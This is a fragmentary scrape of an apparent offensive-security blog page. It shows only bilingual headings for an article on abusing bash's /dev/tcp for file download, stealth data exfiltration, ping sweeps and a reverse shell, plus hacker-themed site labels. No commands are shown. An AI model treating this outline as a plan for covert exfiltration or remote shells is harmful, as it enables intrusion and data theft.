[ 0x04 ] START AND FORGET

[ 0x05 ] BASIC ROUTING IN BASH

[ 0x06 ] LIMITATIONS AND PERFORMANCE

RECON_WITHOUT_TOOLS: Exploiting /dev/tcp for Stealth Exfiltration

RECON_WITHOUT_TOOLS: Exploiting /dev/tcp for Stealth Exfiltration

[ 0x00 ] A CENA DO CRIME

[ 0x01 ] MAGIA NEGRA DO KERNEL? NÃO, APENAS BASH

[ 0x02 ] BAIXANDO ARQUIVOS (O CURL DO PARAGUAI)

[ 0x03 ] EXFILTRANDO DADOS NO MODO STEALTH

[ 0x04 ] PING SWEEPS SEM PING

[ 0x05 ] O CLÁSSICO REVERSE SHELL

[ 0x00 ] THE CRIME SCENE

[ 0x01 ] KERNEL BLACK MAGIC? NO, JUST BASH

[ 0x02 ] DOWNLOADING FILES (THE BOOTLEG CURL)

[ 0x03 ] STEALTH EXFILTRATION

./ IDENTITY_OVERVIEW
● SYSTEM ACTIVE

./ EXECUTION_HISTORY

[LOGS: 1]

./ ARSENAL_KIT
7 SECTORS // 55 MODULES

./ ACTIVE_OPERATIONS
7 PAYLOADS LOADED

./ VULNERABILITY_DATABASE
● 4 RECORDS_FOUND

./ AUTHORIZATION_KEYS

[VERIFIED: 3]

> COMMS_UPLINK

ENCRYPTION: ENABLED ● SIGNAL_STABLE

> SYSTEM_KNOWLEDGE_BASE

LIBRARY_V1.0.4